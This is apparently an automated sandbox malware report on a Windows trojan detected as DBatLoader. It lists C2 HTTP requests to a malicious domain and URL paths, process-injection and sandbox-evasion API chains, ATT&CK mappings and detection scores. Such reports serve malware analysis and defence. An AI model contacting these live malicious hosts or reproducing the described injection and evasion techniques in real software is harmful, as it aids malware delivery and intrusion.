Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com

Source: r096teIe1H.exe, 00000000.00000002.242554259.00000000007BA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

memstr_80d3d85f-c

Source: r096teIe1H.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\Desktop\r096teIe1H.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6960 -s 1444

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032A20C4

0_2_032A20C4

Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: String function: 032A4824 appears 325 times
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: String function: 032A4698 appears 78 times

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032BD8B0 InetIsOffline,CoInitialize,CoUninitialize,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,GetCurrentProcess,FlushInstructionCache,GetCurrentProcess,ExitProcess,

0_2_032BD8B0

Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032B7B88 GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,	0_2_032B7B88
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032BCBE8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_032BCBE8
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032BD8B0 InetIsOffline,CoInitialize,CoUninitialize,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,GetCurrentProcess,FlushInstructionCache,GetCurrentProcess,ExitProcess,	0_2_032BD8B0
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032BA6F4 GetModuleHandleW,GetProcAddress,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,CloseHandle,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,	0_2_032BA6F4
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032BCB04 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_032BCB04
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032B7B14 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	0_2_032B7B14
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032BCA74 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_032BCA74
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032B7F54 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,	0_2_032B7F54
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032BCFB0 CreateProcessAsUserW,NtCreateProcess,WaitForSingleObject,CloseHandle,CloseHandle,	0_2_032BCFB0

Source: r096teIe1H.exe	Binary or memory string: OriginalFilename vs r096teIe1H.exe
Source: r096teIe1H.exe, 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs r096teIe1H.exe
Source: r096teIe1H.exe, 00000000.00000002.242673568.00000000022D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs r096teIe1H.exe

Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ?????.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: system.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Section loaded: ??l.dll	Jump to behavior

Source: r096teIe1H.exe	ReversingLabs: Detection: 73%
Source: r096teIe1H.exe	Virustotal: Detection: 33%

Source: C:\Users\user\Desktop\r096teIe1H.exe

File read: C:\Users\user\Desktop\r096teIe1H.exe

Jump to behavior

Source: C:\Users\user\Desktop\r096teIe1H.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\r096teIe1H.exe C:\Users\user\Desktop\r096teIe1H.exe
Source: C:\Users\user\Desktop\r096teIe1H.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6960 -s 1444

Source: C:\Users\user\Desktop\r096teIe1H.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER64AC.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.winEXE@2/6@1/1

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032B6DC0 CoCreateInstance,

0_2_032B6DC0

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032A7FB8 GetDiskFreeSpaceA,

0_2_032A7FB8

Source: C:\Users\user\Desktop\r096teIe1H.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6960

Source: C:\Users\user\Desktop\r096teIe1H.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\r096teIe1H.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: r096teIe1H.exe

Static file information: File size 1053184 > 1048576

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: r096teIe1H.exe, type: SAMPLE
Source: Yara match	File source: 0.2.r096teIe1H.exe.237056c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.r096teIe1H.exe.32a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.r096teIe1H.exe.237056c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.r096teIe1H.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032A6372 push 032A63CFh; ret	0_2_032A63C7
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032A6374 push 032A63CFh; ret	0_2_032A63C7
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032C82F4 push 032C835Fh; ret	0_2_032C8357
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032A32F0 push eax; ret	0_2_032A332C
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032CC10C push eax; ret	0_2_032CC1DC
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032C8144 push 032C81ECh; ret	0_2_032C81E4
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032C81F8 push 032C8288h; ret	0_2_032C8280
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032B3050 push 032B309Dh; ret	0_2_032B3095
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032C80AC push 032C8125h; ret	0_2_032C811D
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032BA08C push 032BA0C4h; ret	0_2_032BA0BC
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032A6768 push 032A67AAh; ret	0_2_032A67A2
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032A6766 push 032A67AAh; ret	0_2_032A67A2
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032C7508 push 032C7720h; ret	0_2_032C7718
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032AC550 push ecx; mov dword ptr [esp], edx	0_2_032AC555
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032AD584 push 032AD5B0h; ret	0_2_032AD5A8
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032BD4EC push ecx; mov dword ptr [esp], edx	0_2_032BD4F1
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032ACBD0 push 032ACD56h; ret	0_2_032ACD4E
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032B7904 push 032B7981h; ret	0_2_032B7979
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032B6940 push 032B69EBh; ret	0_2_032B69E3
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032BC95C push 032BC994h; ret	0_2_032BC98C
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032AC8FE push 032ACD56h; ret	0_2_032ACD4E
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: 0_2_032B2F44 push 032B2FBAh; ret	0_2_032B2FB2

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032B7B14 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_032B7B14

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032BA0C8 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_032BA0C8

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\r096teIe1H.exe TID: 7000

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\r096teIe1H.exe

API coverage: 8.6 %

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032A58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_032A58CC

Source: C:\Users\user\Desktop\r096teIe1H.exe

API call chain: ExitProcess graph end node

graph_0-21126

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: r096teIe1H.exe, 00000000.00000002.242554259.0000000000810000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: r096teIe1H.exe, 00000000.00000002.242554259.000000000083B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.me
Source: r096teIe1H.exe, 00000000.00000002.242554259.000000000083B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032B7B14 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_032B7B14

Source: C:\Users\user\Desktop\r096teIe1H.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_032A5A90
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: GetLocaleInfoA,	0_2_032AA7A8
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: GetLocaleInfoA,	0_2_032AA7F4
Source: C:\Users\user\Desktop\r096teIe1H.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_032A5B9C

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032A91F0 GetLocalTime,

0_2_032A91F0

Source: C:\Users\user\Desktop\r096teIe1H.exe

Code function: 0_2_032AB770 GetVersionExA,

0_2_032AB770

Source: Amcache.hve.2.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	1 Native API	1 Valid Accounts	1 Valid Accounts	1 Valid Accounts	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Access Token Manipulation	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Process Injection	2 Virtualization/Sandbox Evasion	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 DLL Side-Loading	1 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
r096teIe1H.exe	74%	ReversingLabs	Win32.Trojan.Leonem
r096teIe1H.exe	34%	Virustotal		Browse
r096teIe1H.exe	100%	Avira	TR/Redcap.zvjcd
r096teIe1H.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
balkancelikdovme.com	18%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://balkancelikdovme.com/llg	100%	Avira URL Cloud	malware
http://://t.exet.exe	0%	Avira URL Cloud	safe
http://balkancelikdovme.com/	100%	Avira URL Cloud	malware
http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveks	100%	Avira URL Cloud	malware
http://balkancelikdovme.com/llb	100%	Avira URL Cloud	malware
http://balkancelikdovme.com/lln	100%	Avira URL Cloud	malware
http://balkancelikdovme.com/ll	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
balkancelikdovme.com	185.181.116.217	true	true	18%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveks	r096teIe1H.exe, 00000000.00000002.242554259.000000000083B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://balkancelikdovme.com/llg	r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.2.dr	false		high
http://://t.exet.exe	r096teIe1H.exe, 00000000.00000002.242498292.000000000019B000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://balkancelikdovme.com/	r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://balkancelikdovme.com/llb	r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://balkancelikdovme.com/lln	r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.pmail.com	r096teIe1H.exe, r096teIe1H.exe, 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000002.242673568.00000000022D0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://balkancelikdovme.com/ll	r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.181.116.217	balkancelikdovme.com	United Kingdom		29017	GYRONGB	true

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1296092
Start date and time:	2023-08-23 20:08:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	r096teIe1H.exe
Original Sample Name:	53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841.exe
Detection:	MAL
Classification:	mal96.troj.winEXE@2/6@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 24.3% (good quality ratio 24%) Quality average: 79.4% Quality standard deviation: 21%
HCA Information:	Successful, ratio: 99% Number of executed functions: 22 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, geo.prod.do.dsp.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, arc.msn.com
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:09:00	API Interceptor	39x Sleep call for process: r096teIe1H.exe modified
20:09:13	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.181.116.217	0vJrK0NCd1.exe	Get hash	malicious	Remcos, DBatLoader, FloodFix	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
balkancelikdovme.com	0vJrK0NCd1.exe	Get hash	malicious	Remcos, DBatLoader, FloodFix	Browse	185.181.116.217

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GYRONGB	0vJrK0NCd1.exe	Get hash	malicious	Remcos, DBatLoader, FloodFix	Browse	185.181.116.217
	CX17SY6xF6.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	PIyT9A3jfC.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	nhVJ8J5qOt.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	fs7AQcREFX.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	https://farma-net.com/admin/auth?userid=rob.mayberry@gelita.com	Get hash	malicious	HTMLPhisher	Browse	89.145.93.101
	IrJyqwDp6P.elf	Get hash	malicious	Mirai, Moobot	Browse	83.223.101.7
	6gjnnBAbpc.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	83.223.101.9
	iJzpyjAehB.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	EksRd2mRLH.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	83.223.113.46
	rLDmqbpt5D.exe	Get hash	malicious	Pushdo, DanaBot, RedLine, SmokeLoader	Browse	83.223.113.46
	irLUxBeO3j.elf	Get hash	malicious	Mirai	Browse	212.113.144.7
	d4bNCWDk1F.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	83.223.113.46
	https://s3.amazonaws.com/appforest_uf/f1673569031431x837044964462498200/index.xhtml?17373464282007070576159867576718836072896596236213191414781774633016138409263067560810655664611593768691127511520387902715816470054901430985217113983744921341215241681383688426527535794966000143072299496022028714025186539246245021092115024781420437166872573917715270671544911886953886795996849529998276450=!!ERROR%20IN%20FUNCTION%20PARAMETERS!!%20'boyd.eastman@imail.org'%20ist%20kein%20g%C3%BCltiger%20Integerwert&1765620972=Ym95ZC5lYXN0bWFuQGltYWlsLm9yZw==&1/16/202318961133127049864077866167768198212901460441750214020786111898549251534145544273852461499171043240208500698254918200574448252831614537487276212299050019524818481725182239195411702340331216281502686321309755971688813861&email=boyd.eastman@imail.org&2048532416162595706016219186831446773579524518014200612466611761644571231872529944108636910539217157238248758958712136946159490521927112180269811067101566160108479243853193319321023555707545963759105821172180882197934179314148125212682089161392996891286741775134210235114693034421458487518136059350121079991895186634721265116660=138892235	Get hash	malicious	HTMLPhisher	Browse	83.223.113.113
	1EsDtA4mep.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	MYorfmVq9Z.exe	Get hash	malicious	Pushdo	Browse	83.223.113.46
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	83.223.113.46
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader, SystemBC	Browse	83.223.113.46

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_r096teIe1H.exe_9ff8d31d6ce1718a718151b20b7d2ba75dad8_24aa85d4_1ba970a3\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0635344594012552
Encrypted:	false
SSDEEP:	384:EqFRCIgTUBUZMXHN+jl9/u7sdX4IteoW:EqFRCVTUBUi3N+jf/u7sdX4Iteo
MD5:	698B1166EDFFBBB92EB037D7D0CBD537
SHA1:	FC541D361936A08F5DCAA921C43A500D8320E842
